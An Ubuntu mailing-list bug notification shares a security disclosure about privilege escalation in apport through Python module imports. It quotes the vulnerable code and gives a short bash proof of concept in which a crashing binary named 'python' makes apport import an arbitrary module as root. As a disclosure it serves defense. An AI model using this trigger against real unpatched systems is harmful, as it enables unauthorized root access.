touch-packages team mailing list archive
-
touch-packages team
-
Mailing list archive
-
Message #113791
[Bug 1507480] Re: Privilege escalation through Python module imports
** Information type changed from Private Security to Public Security
** Changed in: apport (Ubuntu Xenial)
Assignee: Martin Pitt (pitti) => Marc Deslauriers (mdeslaur)
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1507480
Title:
Privilege escalation through Python module imports
Status in Apport:
In Progress
Status in apport package in Ubuntu:
In Progress
Status in apport source package in Precise:
Fix Released
Status in apport source package in Trusty:
Fix Released
Status in apport source package in Vivid:
Fix Released
Status in apport source package in Wily:
Fix Released
Status in apport source package in Xenial:
In Progress
Bug description:
Gabriel Campana <gabriel@xxxxxxxxxxxxxxxxx> reported a security
vulnerability in Apport:
ummary
=======
A privilege escalation was discovered in apport.
Details
=======
The command line of the process triggering the coredump is checked to
determine if it's a script. If the interpreter is Python and the first
argument is ``-m``, the method ``_python_module_path`` is called to find
the path of the culprit module
(``/usr/lib/python3/dist-packages/apport/report.py``)::
@classmethod
def _python_module_path(klass, module):
'''Determine path of given Python module'''
module = module.replace('/', '.')
try:
m = __import__(module)
m
except:
return None
[...]
Any Python module in ``sys.path`` can be imported because the variable
``module`` is under control of the attacker. It should be noted that
``_python_module_path`` is called with euid=0, and apport relies on the
process name to determine if the process is an interpreter. A crash of
Python isn't required to reach this function: any process name starting
with ``python`` and producing a core dump is enough. As an example, the
following bash script triggers the bug::
#!/bin/bash
cat <<EOF > python.c
int main(void) { *(int *)0 = 0; return 0; }
EOF
gcc -o python python.c
./python -m venv.__main__
and results in the creation of a "lightweight virtual Python
environment" in the root directory::
$ ./lol.sh
./lol.sh: line 8: 7665 Segmentation fault (core dumped)
$ ls -l / | head -4
total 100
drw-rw---- 5 root root 4096 Sep 29 16:09 7665
drwxr-xr-x 2 root root 4096 Sep 29 05:41 bin
drwxr-xr-x 3 root root 4096 Sep 29 06:20 boot
Criticity
=========
Importing an arbitrary module is a security issue because a few standard
modules rely on files in the home directory associated to the uid of the
dumped process. A fully working exploit has been written (targetting
Python2 and Python3), giving an instant root shell to the attacker.
While the exploitation is straightforward for Python2, a bit more work
was required to find a suitable module for Python3.
The vulnerability seems to be limited to Ubuntu Dekstop because apport
is disabled on Ubuntu Server.
To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1507480/+subscriptions